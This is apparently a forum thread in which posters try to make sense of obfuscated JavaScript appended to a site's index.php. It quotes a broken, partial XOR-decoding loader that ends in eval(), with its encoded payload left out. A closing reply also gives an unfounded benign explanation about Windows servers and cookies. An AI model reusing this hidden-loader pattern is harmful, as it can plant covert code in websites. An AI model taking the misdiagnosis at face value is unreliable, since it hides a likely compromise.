To the uninitiated, this may look as if it's merely a whole fucking bunch of numbers ... to me, on the other hand, even a brief glimpse reveals that what we have here is an obscenely large sequence of arbitrary digits. Umm ... I'll get my coat ...
Here's the same thing reformatted for improved readability: (comments are mine) Code: // this is the function that gets called way below function iqxZEA( ozusYD ) { // but this function doesn't seem to get called anywhere function ooGfjX( cqtQ ) { var gDYXQE = 0; var mDkzD = cqtQ.length; var gBWab = 0; while ( gBWab < ( ozusYD.length ); hyCi++ ) { var qeGhc = bwvWN( kDlr, qQHQfN) ^ bwvWN( dPWDR, qWbD ); var oHIjVl = bwvWN( ozusYD, hyCi ); qWbD++; qQHQfN++; if( qWbD > dPWDR.length ) qWbD=0; if( qQHQfN > kDlr.length ) qQHQfN=0 ; pUOpGD += String.fromCharCode( oHIjVl ^ qeGhc ); } // weird ... what's the space doing between the p and the UOpGD? // if it wasn't there, the variable name would match the pUOpGD // in the lines above and below eval( p UOpGD ); return pUOpGD = new String(); } catch( e ) { } } // Ridiculously long byte string argument omitted because it fucks up formatting. iqxZEA('...'); Beats me! P.S. I know f*** all about JavaScript.
Maybe it's supposed to distract inquisitive minds like you from the REAL security hole. Trust no one ...
why: because knowing where it came could help in finding out how to read it. do you know answers to my questions: how many questions do you have?
As i wrote, it's from normal "index.php", the file is without changes, only this code was appended to the end.
I am far from an expert. I'm no software person. My guess is: You're working on a website and the server uses Windows/Microsoft. Some of those servers have problems with php and sometimes html conflicts with certain characters in the text. Sometimes there are code keys installed as a cookie so one time viewer get the proper translation of those php characters that have no meaning within the html. When cookies are not accepted the whole thing fails or locks-up. Again, that's my wild guess. I'm sorry I can't give it more time to investigate for you. Good luck!